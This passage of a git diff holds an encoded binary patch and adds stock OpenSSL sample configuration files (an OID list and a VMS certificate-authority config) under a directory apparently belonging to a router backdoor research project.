z@>P0M+Q;51((CIzo%iHA;CQ^X$*gy3Zm%x$6=wF{;W>bc(3iat2EDt}p6zFvWF=Mf
zEeZP;q6{rLe`8@_-?D>@eKPs#yV6~vWgn91M~*o>Dp#7WOSxD0^aXhCa3oi<1I%2_
zO9gg{=5x+v;5i*VgGIZ?iL|&=X<wt39h@TcJJq@Oh%tGgO<EnNjWhnG_nAsNUpLk}
zlxFrB*+o`F@QoQ)T?KZ1`W|JX+(#HCov#;hN)FRyB>Tntkb-LwGx;ck1=c+3dNof-
zPE2N8WB#6=Ymz$4<t=bzB`@ayWt(nqly*h`irVeupcQ*`ld^IIOE`HUvcT(=^5SH5
z=3RQdGFo51;Ha>?A~L?BA~Ju@h+#9^+fwni)VS1|j`-1$hK`Qbmd1uuOMBZ<?TyKf
zafx`cqrEK|?-#6#w=GXK9~~LpG-B9@VL?qI(VmDjG&aUNQY~%EBaQ8CZSh7iFf3Rw
ze^Gr<+jdq%YfDok5nq*#CsS6Vqal$L`S~*!EpU%DCgO0R-&kZu?R=}3JGN+1om7^J
zuTGWc4w}lLs#In+v>l#`ERUzit;n*bVL^S%%6NM^6=`p?M}`H9+v2M`;CftqO(oXI
zk){^i5|YogV^O>n(vi3Xz&d~?Ce~21BzR4696l--hx&qXDP3_;+u9mm-q0E``w_$_
z9gmDo4hzPm6RjqyHb#pV)`2&-Ct;wYJ%N9l;|(wyjB8om)}DyR;6pI3t^KTcqGj0{
zDYZ4m<tt`N(u*j^8smvnGEkiwTM=IqYiUwa216hTgAJ)PO!nJST6z1;4J~as#aLr=
zym1ArLLC7_`m{(p6X|3s)}Cq>FL9&=9hHF6(uO9~f#c{lab#7@mf)c+t`hU&vwVw7
zV&ufCWi72}mF!!?+DW@N(@4y$>S#zc2jf)UwWQX>IuMukrd-S|k7%x=o=l<L$ymek
z_&_;8BZRsUH|4nMPBlEFUv-Tw$s`gW&|eV=Ys)ejPH<ax0w(j?BLn3kNn{{&;>b}w
zvS!+`kUvnyCDEn^n<&UsghCA&%_D8;l}qCZ?R5)MaCI<lW)*s3B|>U*FWu1u*Ycv!
zX0kgcqX#yILb@%bt+h2ZtdShD{gTiDF<qTl*%T;G)2WtL#2&*cDdCgJB=YTc%n_JP
zP8$}Sjl=-e`;mr390@K1Qu;VT8(4?IZ4E0$$^<P>a9|)ID8Y8^Q3pg)?Gcr_5Vb+0
ziX)ckK(eq($b8F=U5QQJ%oaJjCDkky=>*DC?ntzpCH;Unicepwt5dySy`f3ZP?$-`
zg{0VNX=`jvH^uR-OsZMU%)l}rMLfyvZEBaf(rPudVg8ep()pV#XvPj-HiOn6Q)DDZ
zmbE8VM%tJ4&+dBSQOEjK3M%N64g%%~E46|es%epiHkrJ0+Hi0{Qk|V>L9nZ97DnQ2
zjqOc{3y&;`+#!-%hoEvZy8FY8>b>gfH0h{gBFj^bz`2Gdf91;(?JM)EcMbUTb?y23
zYVz+7v??KCbbIwdwAPGxG#6PhKt*T8*J<H&6~PHAuO1UobM}+NFfZq?i2QSOTTVC`
zM~AubSAsY*%c(AcWrUhsb1J4F6Rt!%om45#HlU$T0g<MbM8BRoC84|X(i##tiMJ;(
zQ9(&fDtR+YK_!uZygno4cd$CQG{9hfHAcgpdCVCpB7s=hu)1YsdZnxYS}>T`!099w
zIUNmcjce4Xi_1Dh76$#ND5a=cX0`RPh)lII;Bz{5QP3ZTNJRIkK6mCuOQazcX=rUl
zHGERFjr*E;CK+!?G&aj%*YgY(JAC%fRh(C=#~xI3YlWPmb=Xvt*L|`8#9{=!idNf!
zpYIC{%9P5h8WRCE`zxo_L0Jr16WS4}$}D`eH@Xe|dTNc@KT8@dSss!1x!MFfQKx$J
zGK%YIYL9T7)G|w)l;#YqS&tSZ5^ajf7*E@#Vbur|s8%fsZ1)-!3T?zBRKFN>W>z^0
z&;uhi2$_XJo}><|)J?K7dezC!20dxdlCq@8(?>o1Cipx#P*tr%@|88Bn%(oGwIbg0
zO4)=(_xjhJ8OeaGu=<CmwqO=xI2GbxIu%bwmc}t&;t^bNq#}A5hPu_t%F*ptm1S39
zJ>@f^g5|vNI1*`T!bKe}1`s!WYFN6aP~NCTM{TuKZq5T-e}CoXpbDH>5{_w#FKbA*
z!vD6`mX$cCHjRauX-&&9%Qv(x|5nZwHAUyvwV2+P<1$djD=rS;o?VmJD<K{_mSLEi
zi%Llv=j_t343`#gJ2&Z_ZI;gM9dR{IXblMugTzvEe7-r(=MI%QcI_=ETe_Gtp6YdZ
zGM-ZF?R1B^_|;dOIuo2sH}$o)YjXu<h6VW}Dd?9Pn7?$8R*%6+4Y*vzwXe*@s!@%t
zEl2}<i7QL*@^V}(&x>QiY;abnqLgZGNn%kRPpCTp2M-HmeCCf@r!4~o3MnP6A@<h9
z(M)FC3AjA4ePsJkos{MBSo@B=v5N~D*GH;!mNlTvRE65Jv@MV;k@Ci%qM~pX=(Xe5
zrGZ^tF3h>0T7o+w$;g<|G71VV0!(%GnqD^`iFL$DRSW0U&YOL7q^%wQ;mV!QWoWQM
zC#p+(d$U1Tjg^nVvl?1janU|3$Q>}}nfY^u1*4NkM}nG#3+FF9I)aPNMe0Hq;YqhO
zAs2GB8!kgmR{N?AI4&{YrC#!4vASG@Er5A4apk}+3*!yR_BM$CjxCIz)vj+LMe1P;
z3c>7|GmnmpS-cb%k?F|P@(JY?<H9LvwHtnCd_{T1#IYL79XHwV=p&Fj#dvrW%$~Pc
z9=-PnlgHq)?Ww<lLFX(C2CW`BXush*7t1ZeG2r`~V?UJd86_h(3|>$&>Y^dDOV$n=
zyt-smRmsR1CB---w}Yc1gDnbOk=;1Bx@6RbA+t&%7Y(f~8MCfvZb?t^kb?%5jHxP#
zRF#Z^h*B24PEo}6gg7;;WaOoTXOxV(WJpa(WaH49k}(^KW|vf4v{O|{<+`1ZFIhWy
z$kjtiDyvH>s!GPpD2YJS+UkM&)A-018;gJXZ9#D3&>3Q@iflbSbjV(NmpngoPRVOS
z7vsCC1mx2}D9r<Du;is7!%(aRI)2yVO-aOOKzwjQ6<!;<4Bs`PKSA_oLs*Eixbsky
zME!JpM@431QQ;OS*9-n5VI3NL)K}=>5cODW;E^G@Ud}%@L}f)jlf5A-OY*t&?_jd8
zasg~V!|lH6ccVHaz+>$K+mJx44cvwV_`!#>9i{dqYxB2>YPTqmKSILWRJBtStYnDt
zw+v4>e5T>+9Io@YD7e<)bB+8x4qs^a^A11BaCz;6w^P+lQ6PUAfwu<3r#O7M;rlsU
zx3egi<M5=BKiT1H3}5Z=3k*NU;a!Gb;P7t4*E{_ChX2&zR~UZ1!+&JBdSykG^*{e%
zxIEC~?MA~Na`>%=Kk0CJbS1Oiiw@WQR}{SI@U2F^*WnKv{tt&gVfau?sJzLe5vg}K
zhreL>ehz=t@Ct{&W%zW5_Zoh@!#^_o6o-Fe_;QDTWq8WrLsUD9f(snJi{TeLywvcG
z4&Tf0D;%!#xG4Ck!w)v{H#+=q!*6%^IK%I9_yohZI((|(PdNNI!(VcEjp1)NT#vV+
zpx5Dep%+_G@TJ2~GJKSr+h{w@@G^%t8h)(9TMVD&@OH!JIXrFnNe(~P@Y5WAq2Y0d
zUu^hlhi^3eI}X3x@JAeemEqrW__c;V?eL!&ezU`GHvD6U-){Kl4*#9u|8%%|(vSWc
zDvKf7wi)>Y9sa1{V;ugJ;Z+X*gW*w!zhw9c4*#>^Cpr8b!($GA&+sOPe{6Wd;h!14
z-r;?QU+wTBmB&TFR)_Cu_+K2Z=ewd{FXxmkzb}+=F~i{p82%lHA8PpB4j*fH5#CGV
z?I^?R96rhL^BsPS;kP=x%JBCbKHKmkoh8j&!&f+bk>NKx{A9y>9Ue1$KWAwaH~a*L
zuQ2=^hp#gH4u_v@_}dOY-|+pMrB|ona~$4n`1ub1f#LT!{3^pgaQJ4!@l+shyWVhI
zdgX1uG<>tee`EMZ4!_s%v3P-;w{3>U94^1pmHhm^!~e_h7aab);l+5NowrvFpXTtl
z4R3Jxdxl@<@V^`Ws>8o9{GbtBE7s;}UMmXDaQH5UU+wUbhCk!*y$v6QpKkDWpy4rx
zk2d@&haYM9n+~5~_}dOY+VGk9T@7zlhM(c^sNrWhe7@mVJN!h$Z*sUk{}lxfJG{xr
zzwGc8h8M}jG;ImPk8=1L!)G{rt>H}$zu55A4!^|kZioNS@Ij8B*BE}iBmW<UZ*}-h
zhW9!AcEbnbS8=@EY4|P<zt8X?jz13>KHQO4*ZLTD<qm(=$lv7n^OE6n9QoG`k2^eT
z__+@M(D2J0{)yqga=2bM6a^1Cyhxq@ih@@iKHTt+9WL*n$~^O_!}m3OH~e0Zw}TB2
z9j@0OMZqM8A7$jL9X{FcSq?we@Wl?VHhihW=NP_|)4vN1KiuKcmLY+2G6g#s@=n*P
zX19Czg&w}a!>{u2pL+POJ^UUIf84{L_3)QH{4EdP;o&=DJya-edxGzd`!g@Ab)30}
zhKL^Kk)Q10b3FVc4{!4D4i8`B;p;v8`yMWD;1`O+jUIlRhu`Jl+dceU5C7c5ha>e1
z`MHmW9|kV{coXc&rtV+jyTT(s#lvTK_&g7fd-z!%{#_5xc=#nA{_h@sqle$^;SYKE
z(;oh!hri+BAA9&09=;pa_l5d>tcM@%;d4CvG!IXB_{AQ+$-}Sq@Ebh*HV?ng!yobR
zXFU8*9{!Ps?}F=`Lh+aDt3tfo!;kau<30RD5AX2sbsm1Xhu`AiJs!T@!(Z|6tcQQ@
z;UjQeS16tl5C5izPxkQX9v=1ZQ$0NC;otS}Yd!on55LdDU-0m(hkxebcrm<SocHkX
z(H=g<!|^^@LHlwYUZ{WZdRIZ-?cwsbEeqMX*~7Pb_=_Ii>)~H{_#U{PFXYeR9zM;(
zPx9~;9)7Ne|G>jHd-%;B{%a4v&%^E0dwFj#CQtHX_Bndc)Naan`J%ifnP@1l2+Heb
zs((T$jhBBW$UhV1pGor1Wcg=`{8K6aOqG8^B^_!-r4%ZyP^pDVFI0-5(hQYqsC36G
zt?{}(r8{2fj#s+lmF{?@J6`FISGwbs?gXVfLFrD=&MMsrN_T?NouG6lDBTH4cY@NL
zsB|YP-HA$fqHd|uov3stD&2`nccRjrsB|YO-APJ!lG2@|bSEj@NlJH;(w(GqCn?=Y
zN_Vo-ovh?1D+`mA)?{U8veKQbbSEp_$x3&!(w(Aorzou{N`8v6GeudLqI9Py-6=|U
ziqf5;bSsr^rP8fbx|K?|Qt4JI-AbifsdOuqZl%(ls&uC+-Kk1<s?wdRbf+rasY-XM
z(w(Ywrz+hLuZ>8GR4DDRLaB!pN<XYn2EqzuA*@g)!U|<0tWZY63T?$Cm&vqHTQON?
z(#+(UNi>sbCe?JVg*w?noo(TGZAIr>s1q*K85io53w3UVI=R9L+H0L&q0X;RCs?R6
zEYv9$>KqGol7%|ULY-!z&a+Ubb2w3lK&M)$b1l@#7V2yZb;^f2>q4D&q0Z1yr(dY^
zFVqPb>I@8Z3WhodL!E@7&caZqVW=}O)X5j>tPFKRhB_BRos6N*#!wHu5F;-(yKerB
zs=C<xS+f?^)W_<pX4KWhf|l`3F?lg5wy<W=g8B0n)dcuiQB1vmzAUI(G%t*a#L|{_
z#T!%j<xVVyHzylc;8!s#V$1MaPJpB8_c?e2M{CMndm^b#wRfm*{6q=wNTm{OjVn8X
zrtvMd))N-j;3rhZ1+^1vi=VBl7BQ*1BhlU%PbT|kKV=bOG4tA7fS*d8HGV=&zYP{!
z8BaCi*D!#wne|JQJzG{SkS2<DGTEwqOedRF0WU75V#`_^mK)#G;<Ne@l=e_2WxUU)
zEGAdP@b+MUFT6;Uj^~=7s>EBZVa)u5$+k@$z)N)@+Of*9C#}qrTb78&l}l2H;kD&l
zYt#{SVpu6ZQc9+9Hb~?GvaBPJm+&Mo%kV2CX|~!|J%WzIZx_%wg<F;;8WMP=vJJmx
zlExq)ZD~{lA?YK$;@uj|TzK+=`uQ<cr}9r;?uy6c2V6@gRZKl`LJTc60cc1pPud?*
z$w959y}=vALCuK^V#(%)P&ZUwYKx`tv#BPjyhD0GDIrf{$@J1Q@y>coeh-tQ6%bk~
z?|?3CNx{V+iR4fTT05`4W_Ha&GTYLmdWerw6U+;l;(3KsFMdg_`nAoaYgDZ^MdYnK
zi80==)ZGzVnqIano(p&`@cNz6T$h<%KqHg72+y^L_H-Uozw<MBLq3J(Cv7U+mdi_s
zxdf3BqX!xfUp<gixb@GW)W7In`Ds+1v39)hh$L3Oc+y8^R4uBVDKmhIo9>5|@}3-m
zbY?+i1gt_IFxCV}G*wOL0KMO~40%1{_*nbWGsm~dQIzpLK51Grvu0s^Z8dccH1$uN
zVv>V-J&0tPF)xr;T9LlhEf^k)XGumkr7^?Ii!E&%-;9=`q_VYsNqww(hU(a*lH|E4
zENw`(G)m`(GLPXGaY4GRL*}zY{Hzw`uS|!F@V;VQjS7hp#oK@~6Kappikg}Ax*p|X
zeeK*D+MQi9uV!IYUF|6~)%{0QU>e&y)^Pu7XZm}$zavy5ka!s4O4H8Is)uO)G_$tp
zVEyK%ZCD{F5pyi6+1@fe1@{m5T)o<%cq-kIH^>*&&tF&*Q_~vehK7~ePA<uj24PIK
zQXf#i0T>to{W532ZfqHPEUy__(f)+Q7?U|fccN;R>I*mc)Vjt*D|%U8<W%A+&$a)m
zaccj>nuWEqPL3_8T39t#cd5(|3+B|EtoKCHq!Z>X9Td!8?H#%-HZUv7^s9k=oF|V7
zvE&c%M|RY949c?MwsIivL|I-Z5S#Gd;$!(Df!L0~hviRKRLlPkWh>uK{7&K-;&&1M
zJ#m(Q&T#SnZjyh6xI7ZI^}c1e>;GR#p6z@@^70OtwNqs7n~R-$i62P(KZ(m<<B(1K
zl$cvP@;8QM6FXb*vAmY#*`Ec(<&mhB*Y67r?3YzWUi#%elDF^k3GX5PUGiru@$XZ;
z?2r6jUN&i$Jj${D==XC5`tx&=XFK}+94*gr{=Jcx_;5ZPA{Am2z6~E+Z)muD$@RMB
z`u&Z8{+vd3IImiWKR|Z$`x4sDgT&WSz4EBe)@$Ey6F+&p{G9ARMDo8T{xEU%KbOM3
z*m;EbyCl#4f9B!4sppltzvNM!_481}#r~tjk0H+XXOo>hNM1ir*M2@m{4ug4W7*dG
z2eKpYlw1BX$+Mlm5r3TIi^Xwl^7RBh*3LJGKS}&B;!hDjj`-8W?R!*m_`irhMDiTB
zzj}DFc}^pTISzXmF5R{l+25b|H;9iTzBlnnWS`@9Eb;9mKacG2c$B{`C7bv&3LhKK
z7}?=`ZY3`7vRZk0ekYr>_gQ=_m*;e{3FmSByx~&sKKNMqSBZ<CUzqdMd^}H)P2~TG
zkCi{saIr7v2+L0+d2Vl$hp!+z&y$@l;x7=Fzkep1)cYbnw%%)qzeHS~TgfK!%umMs
zbJ?U_`{HBmG#D=Oe<FS<$?r$}3Xl9<#9t=)=g5xyj>Fb#-vbkW4j}$M*<pW*abH?C
z@l(#l*3P~jex!#dh|4?A){cFjO#I<~>@@Pi4<z{v+2Oq1M)C)d{O?Jg+w~>MM@W9?
zFzjG+`(={h;?KeOSpSdp$m4Gms7>s=hL4r+B0Gl=-$?T8=QSjMD9K;vk^eQxmy!HE
z9(nnnVaX=#8jX+jbGt|W&m?~s$!9(CgJm&_P3#|zkF`I{a5v6}k^C5vFZakFOY&n$
zzQ!Z}ZIVBN<QqNmYe@c^B!8ht{tA*mlH{-T$lpow<4C^8BmYN|FDLm|Jo2BA{81#|
z=aJt_7TMUOzbf#t{dIuhZhsv~@*&Aj^vKU7`SBz_$0L6V$xk5pr5^cJBrm@evi`5}
z$X`$LlSuwnkNis{Kbhp;@W}6JF3cpJQ%HV)!`*n!A^A#@U*wVRB>AZ%FMqsRHrM{$
zB!4uH+xXn?k^h+Fk0JRlJn~1H_dBJ%JfF`oT>SYn*;z&M(}<r(@;o2@m^h#Bwve4;
z$<AZMzeRjI*<t&CC(icwl#3#4(yrt1v2i<)IJbAS;nH3{PlY5uo$O2{dG_Z_lCL89
zghzfe$<HA98$9wako-)N|FcJack}R6;!sWU`x@@%+i}ESC;260hvOC_UPJQB$<7<Z
zFC_U{#4{w%@%#;O_UB2m!~Xn%_-wNOGTC8&J|+Gp$saBklh`CaZ{cI}XDaa?;!B9X
zO}yQ3iGP&%*(A^H-AtVQxu5KCdmklUOZJ~8JDkt&6Mu)~zaaiD@!{sZQi(&B_-MnW
zUF=T<@#9JU7_!6uv=Hwh`3uR;9O9cu{x8I@CEiQ?cH-PG4-)??$-hpV<#!k^?X4sE
zf08`+<56;Pj!op};$!n?is2GZmXDMCJd$7Ok?$tX^WM+M4)@C~#OIU!-;y2fm*+@+
z0m;8g^6dX0xru;H+Qt4HWVpoP1bl29%84%|KAG&W{UyZN{#j&)+to#U5!v5JcG&(s
zBwtVR+dT3gk^Ewk|I8zQu-sh0CUH0s9~+0UhP(MNoA`Sqf4Yay{sx4wiGA+(dBjh`
zF<b9q!=>Ke5<ivX*-j(zB_w~Q$IdE}XFIEjpG<Zx@YuPC<k`+f;-`?EO&&W}lRVq`
zDe-TUof|!NZX<cN^E=|FlASFcI}egP+j*S$X=LXakDV7up6&dZ_~~TlU5}j)NS^KN
zARZ$-UwP~dm78MN+&tWs_!&5E^Kf^=-8|ff<k_DH@dmPUxW`U8$+MkF#FvttX&yT>
zNuKQ-PrQ-roZzvugyh*yjCd2-S>~~`lH}P=ig=vtoa?dkU6N-z8RE;x&Sf4uSCBm0
z*-U&n+4-5r&MhR*c79E~ne5!{v9p!r+0G-xTgc8+9y@;|dA9R1@iWQJn;tv8B+qvK
zMtlX?`OITS-4uqLJHB?7o5hB=;@gg|62sl`wHL{=Kl>A3Np=qP*g1ma*-l8jjqFr<
z>>Nk(Y-bkncCs_qW2c_v+0M6#caWW>9y={0&vrV9uOd5Vd+dCN<k?Oa@dVk~;IVT#
z$+Mk*C!QobKk?YPf#liFt;ADg=eHg^|4H&}=K<nrvh#b7o$Vygc3vQU7TI~tW9J=`
zXFDGfKb!3Q!(-=5l4m<Z<e>;Q8F#DkvEyr);qLg_jpW(RDB^3#&OshKhmkzn8Atpa
zvNO?R=NOV_J2Qx%OLl5Kb{3F4+c}B&d1U8wkDWNlvz=Dr=aZeJ$Idw<&vq^({vEQj
z-ec!dl4m>rM*IS@^COR)>qwsM+)R8e+4+^n&RrzWc6x|kNOm6f*m;uV+0Gw`f0yk1
z$z$gYl4m=AA-<06eB`n7Dao^)KH{BZXQzF!gUuaZBMf)XgL@M1f}S0x`+4jfLh^T$
z{8-`_5wGyrnL_dxll-@c-%Y&6W9M{|Ur+LlB>z6~R+9gKc#`CwBYrW--%b37#52Ty
zM0S2le4IS&#3udnAwD+FlZbyryoUJSh&K_xlla*lezD<hzh6T9dt~QIvcvvgOY$6t
z>q!0{vU3;lXNYel{xR{g{jq~h{OrcZ#%DTluJ?GuC7yhL@&u3kQsNuPek<AG_FhKv
z8%h3$B+vE!oaEWh-w?lq?A%9o{!V;5$zMwRMdED#Z)E2mB!9>O*um!Z`&i<a;kb=+
zh2ieJaS!nwB)_{nw8rMz--r13aopOE81CAiM*I_!ZzMZEAbvh^j>8Yg4)@Dd9{HPy
zUrzRKB|DrCPm=s5l7E@xxgS3!`5%(}AbEI?&5he$hD&_7ALkMO6vu2lPxjb3gZRIZ
z{CcwU8S!gK{tDthA^ATMzlG#^{`@t`^ZdD$<gX+<50O02&#xMO1Y|!a`433`cf>y-
zo;ROFAcW10^EV?3D}EJ<HlE`Rck^=&@h?a|M*K_S8;O5K{3hZ&j-Dd^Pm+IycpvdT
z4?p%`2w@Zd<<D8#cGVCcMErE(gNd&oE`KY}+DQ-}O8gw+eBbq##N{1SYv)1Y{G8}{
z;yaQ24&v<R+(V?Hy1hG-e1qZA@BfaEt#>8ytBEJbPBGcJnB=b^`3)p5e>2e9znb_k
z;&&3?mH3myhZBFB_$yRz#i7{2CjC2t<gX%LLi_>ZEFY99Gs=$qZA0t-2;w7&?@N3)
z;)fI8o%llHdk{Z|xcu)@ZN1kL=W%f>ajy4w9{vDv&bP;j%inCY^%jlRaTts*K97ty
zd?@(+_*nVHB+v8YX(Z3{WHZTsgX(Q3d7dX%ll+gU-nAsp^W>!@&;I`#@gI|&Ysn6u
z*KRgk=G(o=&tDNAMf_f}vz6>WOq}Q8XAF1a{37vd$<7;Ohy5%*3_{q%4#$6l;nH6m
z|4}5*=c$88p5tFZ@_e3}MDiT}I+Ex3FCxAfKH2;^h3s&<mKiSb{|(8nBKhADUqhVZ
zd?E3DsJ|{FzAy1>4VQTSgzVo)^6cmH#N}_C+IH=9IFzwT{GY+c@`H%)Px6zAA3(gt
za5qodNM3%kVC`Q@{2=1L@YuP7_)p2tyT}f&-<~2KA^U$MJKXOt6aNpgUpxjo*d#s&
zlbyW`ciVd)@#~;t+dG=<aKDt3{Le^!l1F|%@k7X;6Uh#@tAY5>$$m50VSn05p6#Sa
z{vNWkp5(75eksYb{jJ2GAo-^}{4XB<CGjW8&TeC|gH8I2`2mJYf8BtO?U%zzp8aef
zekjGch3wo&cCH}#GLpZZ<ZmMRTS)#f;=d)%ao$FJG}(WO?B7gwULbjH*IOii3(5b5
z<k_Dui62Jw7R!W(P2%|rd~7^N7%uT=J7pyQOOhY!kw1nw*E^f+aJ_XT{}|bCCVn{i
zpCUWAlKgi_p5yjClE01QFD3cMi2sB*`+o!3VgG+c@@(hHBViPqJI_30xWt+B<YnTo
z<CyK2w}_9SIDA5UEb&3(q*gtSjv&5^hwnk0>y3E$5gtC#!>1AdCizoKoX=m2Jp44`
zeEvO?IG^tl#QA)84sl+WUQGN*^7H#1ex>2k{T#QSk^DHa^D7U(i|mw>{6il3=ZW)m
z%3nM@C|BvA=2e!jGhFhM*L5e5Jg@6cC3#*~H<CQB>sFCGudB}@`S($`&GWS+e>?FF
zhD)69BYrvY9^yYTT*lW{;=dry`SYOR5{F-r{Nu#=eEJO8;d$mm;&+jq2+FdFefij}
z&J-+{dsVWn*Izk#`}Y^0b-4X|enEM1&B|26QhcWp`n%bd67klCa`nG#Eyw>yv>_;8
znoI`eiFVl$@vt0!B&D%^<x2c7h=TIA_Efwa|0@^yzt}adF#F5f(&hN`75E<xrPe@I
z491)B%V7D-2LE5S2&^FO2mD3P>0q+$a+LnI|B5Vc`(a1=dOAatpO=>uuuVTkfA5Mf
z(Jj`y_Vt87me<0E7;e96oq8>I>z8R*Z2oWcL+Fal@%Zp&>rd~_RLcsneoQyz3W2n3
zsnR>&Bql|xXTNKSv1r!lGn2B_v;1TfcE*QuTaJBb^dquEn~lFkt56V|uKvgwT0;Jx
zLA<&8tvFby|3}H97TX!>U;W$lT~N0AqYN)pw;b9$QwucjufK=m>kfQeeX;5Gy=WAl
eA^+n48zhNGo70?NHykUZzuNeJF6m0q)&FlRxRuZV

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/oid.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/oid.cnf
new file mode 100644
index 0000000..faf425a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/oid.cnf
@@ -0,0 +1,6 @@
+2.99999.1       SET.ex1         SET x509v3 extension 1
+2.99999.2       SET.ex2         SET x509v3 extension 2
+2.99999.3       SET.ex3         SET x509v3 extension 3
+2.99999.4       SET.ex4         SET x509v3 extension 4
+2.99999.5       SET.ex5         SET x509v3 extension 5
+2.99999.6       SET.ex6         SET x509v3 extension 6
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl-vms.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl-vms.cnf
new file mode 100644
index 0000000..94baac1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl-vms.cnf
@@ -0,0 +1,350 @@
+#
+# OpenSSL example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+# This definition stops the following lines choking if HOME isn't
+# defined.
+HOME			= .
+RANDFILE		= $ENV::HOME/.rnd
+
+# Extra OBJECT IDENTIFIER info:
+#oid_file		= $ENV::HOME/.oid
+oid_section		= new_oids
+
+# To use this configuration file with the "-extfile" option of the
+# "openssl x509" utility, name here the section containing the
+# X.509v3 extensions to use:
+# extensions		= 
+# (Alternatively, use a configuration file that has only
+# X.509v3 extensions in its main [= default] section.)
+
+[ new_oids ]
+
+# We can add new OIDs in here for use by 'ca', 'req' and 'ts'.
+# Add a simple OID like this:
+# testoid1=1.2.3.4
+# Or use config file substitution like this:
+# testoid2=${testoid1}.5.6
+
+# Policies used by the TSA examples.
+tsa_policy1 = 1.2.3.4.1
+tsa_policy2 = 1.2.3.4.5.6
+tsa_policy3 = 1.2.3.4.5.7
+
+####################################################################
+[ ca ]
+default_ca	= CA_default		# The default ca section
+
+####################################################################
+[ CA_default ]
+
+dir		= sys\$disk:[.demoCA		# Where everything is kept
+certs		= $dir.certs]		# Where the issued certs are kept
+crl_dir		= $dir.crl]		# Where the issued crl are kept
+database	= $dir]index.txt	# database index file.
+#unique_subject	= no			# Set to 'no' to allow creation of
+					# several ctificates with same subject.
+new_certs_dir	= $dir.newcerts]		# default place for new certs.
+
+certificate	= $dir]cacert.pem 	# The CA certificate
+serial		= $dir]serial. 		# The current serial number
+crlnumber	= $dir]crlnumber.	# the current crl number
+					# must be commented out to leave a V1 CRL
+crl		= $dir]crl.pem 		# The current CRL
+private_key	= $dir.private]cakey.pem# The private key
+RANDFILE	= $dir.private].rand	# private random number file
+
+x509_extensions	= usr_cert		# The extentions to add to the cert
+
+# Comment out the following two lines for the "traditional"
+# (and highly broken) format.
+name_opt 	= ca_default		# Subject Name options
+cert_opt 	= ca_default		# Certificate field options
+
+# Extension copying option: use with caution.
+# copy_extensions = copy
+
+# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
+# so this is commented out by default to leave a V1 CRL.
+# crlnumber must also be commented out to leave a V1 CRL.
+# crl_extensions	= crl_ext
+
+default_days	= 365			# how long to certify for
+default_crl_days= 30			# how long before next CRL
+default_md	= default		# use public key default MD
+preserve	= no			# keep passed DN ordering
+
+# A few difference way of specifying how similar the request should look
+# For type CA, the listed attributes must be the same, and the optional
+# and supplied fields are just that :-)
+policy		= policy_match
+
+# For the CA policy
+[ policy_match ]
+countryName		= match
+stateOrProvinceName	= match
+organizationName	= match
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+# For the 'anything' policy
+# At this point in time, you must list all acceptable 'object'
+# types.
+[ policy_anything ]
+countryName		= optional
+stateOrProvinceName	= optional
+localityName		= optional
+organizationName	= optional
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+####################################################################
+[ req ]
+default_bits		= 2048
+default_keyfile 	= privkey.pem
+distinguished_name	= req_distinguished_name
+attributes		= req_attributes
+x509_extensions	= v3_ca	# The extentions to add to the self signed cert
+
+# Passwords for private keys if not present they will be prompted for
+# input_password = secret
+# output_password = secret
+
+# This sets a mask for permitted string types. There are several options. 
+# default: PrintableString, T61String, BMPString.
+# pkix	 : PrintableString, BMPString (PKIX recommendation before 2004)
+# utf8only: only UTF8Strings (PKIX recommendation after 2004).
+# nombstr : PrintableString, T61String (no BMPStrings or UTF8Strings).
+# MASK:XXXX a literal mask value.
+# WARNING: ancient versions of Netscape crash on BMPStrings or UTF8Strings.
+string_mask = utf8only
+
+# req_extensions = v3_req # The extensions to add to a certificate request
+
+[ req_distinguished_name ]
+countryName			= Country Name (2 letter code)
+countryName_default		= AU
+countryName_min			= 2
+countryName_max			= 2
+
+stateOrProvinceName		= State or Province Name (full name)
+stateOrProvinceName_default	= Some-State
+
+localityName			= Locality Name (eg, city)
+
+0.organizationName		= Organization Name (eg, company)
+0.organizationName_default	= Internet Widgits Pty Ltd
+
+# we can do this but it is not needed normally :-)
+#1.organizationName		= Second Organization Name (eg, company)
+#1.organizationName_default	= World Wide Web Pty Ltd
+
+organizationalUnitName		= Organizational Unit Name (eg, section)
+#organizationalUnitName_default	=
+
+commonName			= Common Name (e.g. server FQDN or YOUR name)
+commonName_max			= 64
+
+emailAddress			= Email Address
+emailAddress_max		= 64
+
+# SET-ex3			= SET extension number 3
+
+[ req_attributes ]
+challengePassword		= A challenge password
+challengePassword_min		= 4
+challengePassword_max		= 20
+
+unstructuredName		= An optional company name
+
+[ usr_cert ]
+
+# These extensions are added when 'ca' signs a request.
+
+# This goes against PKIX guidelines but some CAs do it and some software
+# requires this to avoid interpreting an end user certificate as a CA.
+
+basicConstraints=CA:FALSE
+
+# Here are some examples of the usage of nsCertType. If it is omitted
+# the certificate can be used for anything *except* object signing.
+
+# This is OK for an SSL server.
+# nsCertType			= server
+
+# For an object signing certificate this would be used.
+# nsCertType = objsign
+
+# For normal client use this is typical
+# nsCertType = client, email
+
+# and for everything including object signing:
+# nsCertType = client, email, objsign
+
+# This is typical in keyUsage for a client certificate.
+# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+# This will be displayed in Netscape's comment listbox.
+nsComment			= "OpenSSL Generated Certificate"
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer
+
+# This stuff is for subjectAltName and issuerAltname.
+# Import the email address.
+# subjectAltName=email:copy
+# An alternative to produce certificates that aren't
+# deprecated according to PKIX.
+# subjectAltName=email:move
+
+# Copy subject details
+# issuerAltName=issuer:copy
+
+#nsCaRevocationUrl		= http://www.domain.dom/ca-crl.pem
+#nsBaseUrl
+#nsRevocationUrl
+#nsRenewalUrl
+#nsCaPolicyUrl
+#nsSslServerName
+
+# This is required for TSA certificates.
+# extendedKeyUsage = critical,timeStamping
+
+[ v3_req ]
+
+# Extensions to add to a certificate request
+
+basicConstraints = CA:FALSE
